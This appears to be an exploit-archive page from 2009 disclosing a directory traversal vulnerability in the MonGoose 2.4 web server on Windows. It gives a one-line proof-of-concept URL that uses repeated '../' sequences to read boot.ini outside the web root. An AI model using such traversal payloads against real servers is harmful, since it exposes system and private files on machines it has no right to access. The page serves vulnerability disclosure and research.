MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MonGoose 2.4 Webserver Directory Traversal Vulnerability (win)
# Published : 2009-04-14
# Author : e.wiZz!
# Previous Title : Zervit Webserver 0.02 Remote Directory Traversal Vulnerability
# Next Title : ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)

######################### MonGoose 2.4 (win) webserver Directory Traversal  ###################



######By:  e.wiZz!

######Site: www.balcansecurity.com



Found with ServMeNot (world's sexiest fuzzer :P)




In the wild...

#########################################################################################

[Info]: Easy to use web server for Windows and UNIX. Mongoose provides simple and clean API
 for embedding it into existing programs. Targeting Web application developers, embedded system developers,
 and people who need to setup file sharing quickly.

[Site]: http://code.google.com/p/mongoose/


[Vulnerability]:  

http://[localhost]/../../../../../../boot.ini

# www.Syue.com [2009-04-14]